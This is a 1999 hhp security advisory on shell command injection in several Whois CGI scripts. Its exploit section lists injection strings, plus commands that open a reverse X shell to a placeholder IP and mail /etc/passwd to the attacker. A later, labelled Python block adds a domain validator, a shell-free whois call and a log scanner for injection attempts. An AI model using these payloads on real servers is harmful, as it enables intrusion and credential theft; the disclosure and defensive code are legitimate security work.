Whois.cgi - ADVISORY.

From: Cody T. - hhp (hhpat_private)
Date: Tue Nov 09 1999 - 18:51:58 PST


  (hhp) Whois.CGI - ADVISORY. (hhp)
              hhp-ADV#12
         11/9/99 8:42:57pm CST
             By: loophole
 hhpat_private - http://hhp.perlx.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What?:
Hole  in  several  known/unknown Whois CGI
packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Versions?:
1.) Whois Internic Lookup - version: 1.0
2.) CC Whois              - Version: 1.0
3.) Matt's Whois          - Version: 1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions pass the domain field to a
shell  without  escaping  shell  metachar-
acters,  so  a  domain entry consisting of
one  of  the  following  strings  executes
commands on the server...
Note: (Strings  will  vary  for different
vulnerable versions.)

1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entries consist of:
1.) ;id
2.) ";id
or
3.) ;id;
you will see something like this:
'Whois Server Version 1.1

Domain names in the .com, .net, and .org
domains  can now be registered with many
different  competing  registrars.  Go to
http://www.internic.net for detailed
information. etc. etc. etc....
(scroll  to  the  bottom of the output.)
uid=501(blah) gid=500(blah)'
^^^^^\
      ` 'id' was executed on the server.

Other example commands can be run as well...
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail youat_private;
Etc, Etc.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
     A lot of main *NIC* servers were found
running  vulnerable versions.  I am in the
process  of  contacting  the main servers,
and the software programmers to advise them
of the vulnerability.

     Very   well   known/used   sites  are
vulnerable (which will remain nameless for
security  reasons).  I  tried  to  get  in
contact  with  them,  but being such a big
company/service,  I failed, so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
     If  you run one of these bad scripts,
delete  it  and  point  your  browser  to:
http://cgi.resourceindex.com/Programs_and_Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
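The packages named above are Perl CGIs that interpolate the submitted domain straight into a shell command, which is why a field like `;id` runs on the server. What follows is an added example, not code from this advisory or from any of the listed packages, written in Python to show both sides a practitioner would want: for the Fix section, an allowlist validator plus an argv-based invocation that never touches a shell; for the Exploit section, a scan of web-server access-log lines for whois requests whose domain parameter carries shell metacharacters. The sample log lines, the script path `/cgi-bin/whois.cgi`, the parameter name `domain`, and the `whois -h <server> -- <domain>` invocation are all assumptions made for this example.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Allowlist for a registrable domain name: dot-separated labels of letters,
# digits and hyphens, then an alphabetic TLD. Anything the shell treats
# specially (';', '"', '|', '`', '$', whitespace ...) fails this test.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$",
    re.IGNORECASE,
)

# Bourne-shell metacharacters; any of these in a whois query value is the
# signature of the ';commands' injection described in the advisory.
SHELL_META = set(";|&`$<>\"'\\\n()*?[]{}~ \t")

# Assumed request shape of the vulnerable scripts: /cgi-bin/whois.cgi?domain=...
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def is_safe_domain(value):
    """True only for a syntactically valid domain name (no metacharacters)."""
    return DOMAIN_RE.match(value) is not None


def build_whois_argv(domain, server="whois.internic.net"):
    """Argument vector for the whois client, with the domain validated first.

    The old scripts did the equivalent of system("whois $domain"), so the
    shell parsed ';' in the field. Here the domain is one argv element and
    no shell is involved; '--' additionally stops it being read as an option.
    (The server default and the '-h' flag are assumptions about the local
    whois client.)
    """
    if not is_safe_domain(domain):
        raise ValueError("rejected whois query: %r" % domain)
    return ["whois", "-h", server, "--", domain]


def run_whois(domain, timeout=30):
    """Run the lookup without a shell (shell=False is the subprocess default)."""
    proc = subprocess.run(build_whois_argv(domain), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


def flag_injection_attempts(log_lines, param="domain"):
    """Return (line_number, decoded_value) for requests whose whois
    parameter contains shell metacharacters. log_lines are Apache-style
    combined-format access-log lines (see the constructed sample below)."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match or "?" not in match.group(1):
            continue
        query = match.group(1).split("?", 1)[1]
        # parse_qs undoes %XX and '+' encoding, so '%3Bid' becomes ';id'
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if any(ch in SHELL_META for ch in value):
                hits.append((number, value))
    return hits


# Constructed sample log: two normal lookups and two injection attempts
# using the ';id' and '";id' strings from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Nov/1999:20:42:57 -0600] "GET /cgi-bin/whois.cgi?domain=example.com HTTP/1.0" 200 1834',
    '10.0.0.7 - - [09/Nov/1999:20:43:10 -0600] "GET /cgi-bin/whois.cgi?domain=example.com%3Bid HTTP/1.0" 200 2011',
    '10.0.0.7 - - [09/Nov/1999:20:43:31 -0600] "GET /cgi-bin/whois.cgi?domain=%22%3Bid HTTP/1.0" 200 1990',
    '10.0.0.9 - - [09/Nov/1999:20:44:02 -0600] "GET /cgi-bin/whois.cgi?domain=perlx.com HTTP/1.0" 200 1700',
]

if __name__ == "__main__":
    for number, value in flag_injection_attempts(SAMPLE_LOG):
        print("line %d: suspicious whois query %r" % (number, value))
    print("safe argv:", build_whois_argv("example.com"))
```

The validator does the real work: because a legitimate domain can never contain a shell metacharacter, rejecting anything outside the allowlist removes the injection regardless of which escape string a given package happens to mishandle, and the argv form of `subprocess.run` means that even a value that slipped past the check would reach `whois` as a single literal argument rather than being parsed by `/bin/sh`. The same allowlist, applied to decoded query strings in the access log, gives a cheap way to find past attempts against a script before it was replaced.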
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV
before I could release it.
---hhp-2t0--------------------------------